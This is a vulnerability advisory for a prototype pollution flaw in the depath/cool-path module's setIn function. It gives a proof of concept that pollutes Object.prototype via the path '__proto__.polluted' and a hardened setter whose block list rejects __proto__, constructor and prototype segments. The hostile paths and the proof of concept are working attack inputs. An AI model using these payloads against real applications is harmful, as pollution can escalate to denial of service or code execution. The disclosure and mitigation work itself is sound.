A prototype pollution vulnerability affects the module depath (also published under the alias cool-path). An attacker could exploit it to manipulate the behavior of the vulnerable application by abusing built-in Object properties such as __proto__.
The vulnerability is located in setIn (lib/index.js:90), where the set() method is used to unsafely assign a source property to the destination. An attacker can exploit this method to copy a malicious property onto the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.
Proof of concept:

(async () => {
  const lib = await import('depath');
  // or: const lib = await import('cool-path');
  var victim = {}
  // 'victim' is never passed to the library; any change to its prototype
  // comes from pollution of the shared Object.prototype.
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // uncomment one at a time.
    lib.Path.setIn ({}, "__proto__.polluted", true)
    //lib.Path.ensureIn ({}, "__proto__.polluted", true)
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // clean up the shared prototype so later code is not affected
  delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
No updates were provided by the maintainer. Users of this module are urged to implement proper sanitization and validation over user-supplied inputs, such as blocking inputs containing __proto__ and constructor.prototype.
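The following is an added example of the input validation recommended above, written for this page and not taken from depath/cool-path. It implements a hardened path setter (the names validatePath, safeSetIn and isPolluted are this example's own) that rejects the __proto__, constructor and prototype segments before any assignment and only descends through own properties of the target, so a dotted path from user input cannot reach Object.prototype.

```javascript
// Added example (not the depath/cool-path implementation): a setIn-style
// path setter with the sanitization the advisory recommends.

// Path segments that can reach Object.prototype from a plain object.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

function isSafeSegment(segment) {
  return typeof segment === 'string' &&
    segment.length > 0 &&
    !FORBIDDEN_SEGMENTS.has(segment);
}

// Validate the whole path (dotted string or array) before touching any object,
// so a rejected path leaves the target completely unmodified.
function validatePath(path) {
  const segments = Array.isArray(path) ? path : String(path).split('.');
  for (const seg of segments) {
    if (!isSafeSegment(seg)) {
      throw new TypeError(`unsafe path segment: ${JSON.stringify(seg)}`);
    }
  }
  return segments;
}

// Hardened setter: creates intermediate objects as needed, but only walks
// into properties the current node owns itself (never inherited ones).
function safeSetIn(target, path, value) {
  const segments = validatePath(path);
  let node = target;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    const own = Object.prototype.hasOwnProperty.call(node, seg);
    if (!own || typeof node[seg] !== 'object' || node[seg] === null) {
      node[seg] = {};
    }
    node = node[seg];
  }
  node[segments[segments.length - 1]] = value;
  return target;
}

// Detection helper: does a fresh plain object inherit the given key?
// True means Object.prototype has been polluted with it.
function isPolluted(key = 'polluted') {
  return key in {};
}

// Exercise the setter with a benign path and with constructed hostile paths
// of the kind shown in the advisory's proof of concept.
function demo() {
  const results = {};
  results.normalSet = safeSetIn({}, 'a.b.c', 1);

  const hostilePaths = [
    '__proto__.polluted',
    'constructor.prototype.polluted',
    'a.__proto__.polluted',
  ];
  let blocked = 0;
  for (const p of hostilePaths) {
    try {
      safeSetIn({}, p, true);
    } catch (e) {
      if (e instanceof TypeError) blocked++;
    }
  }
  results.blocked = blocked;
  results.polluted = isPolluted(); // expected: false
  return results;
}

console.log(demo());
```

Rejecting the path up front, rather than skipping the bad segment during the walk, is deliberate: it fails closed and gives the caller a clear error to log, which also makes attempts easy to detect in application logs.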